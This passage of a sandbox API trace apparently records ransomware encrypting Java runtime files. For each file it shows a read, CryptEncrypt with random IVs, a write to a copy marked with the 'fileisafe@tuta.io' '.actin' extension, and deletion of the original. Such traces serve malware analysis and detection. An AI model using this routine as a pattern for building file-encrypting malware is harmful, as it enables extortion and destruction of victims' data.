nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x4040, lpOverlapped=0x0) returned 1 [0153.224] CryptEncrypt (in: hKey=0xac34b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050, dwBufLen=0x4050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x4050) returned 1 [0153.227] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x4050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x4050, lpOverlapped=0x0) returned 1 [0153.244] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3430) returned 1 [0153.244] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.244] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0153.244] CryptDestroyKey (hKey=0xac3430) returned 1 [0153.244] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0153.244] CryptDestroyKey (hKey=0xac34b0) returned 1 [0153.244] CloseHandle (hObject=0x2f0) returned 1 [0153.244] CloseHandle (hObject=0x2fc) returned 1 [0153.244] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\tnameserv.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\tnameserv.exe")) returned 1 [0153.245] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.245] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.246] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=197184) returned 1 [0153.246] CloseHandle (hObject=0x2fc) returned 1 [0153.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe")) returned 0x20 [0153.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.247] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.247] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.247] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.247] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.247] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac2f70) returned 1 [0153.247] CryptSetKeyParam (hKey=0xac2f70, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.247] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x30240, lpOverlapped=0x0) returned 1 [0153.252] CryptEncrypt (in: hKey=0xac2f70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30250, dwBufLen=0x30250 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x30250) returned 1 [0153.252] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x30250, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x30250, lpOverlapped=0x0) returned 1 [0153.255] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2f30) returned 1 [0153.255] CryptSetKeyParam (hKey=0xac2f30, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.256] CryptEncrypt (in: hKey=0xac2f30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0153.256] CryptDestroyKey (hKey=0xac2f30) returned 1 [0153.256] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0153.256] CryptDestroyKey (hKey=0xac2f70) returned 1 [0153.256] CloseHandle (hObject=0x2fc) returned 1 [0153.256] CloseHandle (hObject=0x2f0) returned 1 [0153.256] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\unpack200.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\unpack200.exe")) returned 1 [0153.258] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.258] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=49216) returned 1 [0153.258] CloseHandle (hObject=0x2f0) returned 1 [0153.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll")) returned 0x20 [0153.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.259] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.259] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.259] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3030) returned 1 [0153.259] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.259] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0xc040, lpOverlapped=0x0) returned 1 [0153.261] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xc050, dwBufLen=0xc050 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0xc050) returned 1 [0153.261] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xc050, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xc050, lpOverlapped=0x0) returned 1 [0153.263] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3070) returned 1 [0153.263] CryptSetKeyParam (hKey=0xac3070, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.263] CryptEncrypt (in: hKey=0xac3070, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40, dwBufLen=0x40 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x40) returned 1 [0153.263] CryptDestroyKey (hKey=0xac3070) returned 1 [0153.263] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0xf2, lpOverlapped=0x0) returned 1 [0153.263] CryptDestroyKey (hKey=0xac3030) returned 1 [0153.263] CloseHandle (hObject=0x2f0) returned 1 [0153.263] CloseHandle (hObject=0x2fc) returned 1 [0153.263] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\verify.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\verify.dll")) returned 1 [0153.264] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.264] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.265] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=24128) returned 1 [0153.265] CloseHandle (hObject=0x2fc) returned 1 [0153.265] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll")) returned 0x20 [0153.265] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.265] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.265] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.265] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.265] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3030) returned 1 [0153.265] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.265] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x5e40, lpOverlapped=0x0) returned 1 [0153.267] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x5e50, dwBufLen=0x5e50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x5e50) returned 1 [0153.267] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x5e50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x5e50, lpOverlapped=0x0) returned 1 [0153.268] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2eb0) returned 1 [0153.268] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.269] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0153.269] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0153.269] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0153.269] CryptDestroyKey (hKey=0xac3030) returned 1 [0153.269] CloseHandle (hObject=0x2fc) returned 1 [0153.269] CloseHandle (hObject=0x2f0) returned 1 [0153.269] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\w2k_lsa_auth.dll")) returned 1 [0153.274] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.274] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=110144) returned 1 [0153.274] CloseHandle (hObject=0x2f0) returned 1 [0153.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll")) returned 0x20 [0153.274] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.274] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.274] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.275] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3170) returned 1 [0153.275] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.275] ReadFile (in: hFile=0x2f0, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x1ae40, lpOverlapped=0x0) returned 1 [0153.411] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1ae50, dwBufLen=0x1ae50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x1ae50) returned 1 [0153.411] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x1ae50, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x1ae50, lpOverlapped=0x0) returned 1 [0153.414] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac3030) returned 1 [0153.414] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.414] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60, dwBufLen=0x60 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x60) returned 1 [0153.414] CryptDestroyKey (hKey=0xac3030) returned 1 [0153.414] WriteFile (in: hFile=0x2fc, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x112, lpOverlapped=0x0) returned 1 [0153.414] CryptDestroyKey (hKey=0xac3170) returned 1 [0153.414] CloseHandle (hObject=0x2f0) returned 1 [0153.414] CloseHandle (hObject=0x2fc) returned 1 [0153.414] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\WindowsAccessBridge-64.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\windowsaccessbridge-64.dll")) returned 1 [0153.416] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.416] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1378) returned 1 [0153.416] CloseHandle (hObject=0x2fc) returned 1 [0153.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties")) returned 0x20 [0153.416] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.416] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0153.417] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.417] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x33ef6f0 | out: lpNewFilePointer=0x0) returned 1 [0153.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.417] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef704 | out: phKey=0x33ef704*=0xac3130) returned 1 [0153.417] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.417] ReadFile (in: hFile=0x2fc, lpBuffer=0x3791020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x33ef72c, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesRead=0x33ef72c*=0x562, lpOverlapped=0x0) returned 1 [0153.420] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x570, dwBufLen=0x570 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x570) returned 1 [0153.420] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x570, lpOverlapped=0x0) returned 1 [0153.421] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef69c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef708 | out: phKey=0x33ef708*=0xac2db0) returned 1 [0153.421] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x33ef7b8, dwFlags=0x0) returned 1 [0153.421] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50, dwBufLen=0x50 | out: pbData=0x3791020*, pdwDataLen=0x33ef6c8*=0x50) returned 1 [0153.421] CryptDestroyKey (hKey=0xac2db0) returned 1 [0153.421] WriteFile (in: hFile=0x2f0, lpBuffer=0x3791020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x33ef710, lpOverlapped=0x0 | out: lpBuffer=0x3791020*, lpNumberOfBytesWritten=0x33ef710*=0x102, lpOverlapped=0x0) returned 1 [0153.421] CryptDestroyKey (hKey=0xac3130) returned 1 [0153.421] CloseHandle (hObject=0x2fc) returned 1 [0153.421] CloseHandle (hObject=0x2f0) returned 1 [0153.422] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\calendars.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\calendars.properties")) returned 1 [0153.422] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0153.422] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0153.423] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3036922) returned 1 [0153.423] CloseHandle (hObject=0x2f0) returned 1 [0153.423] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar")) returned 0x20 [0153.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar"), lpNewFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\charsets.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\charsets.jar.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0153.424] CreateFileW (lpFileName="\\\\?\\C:\\Program 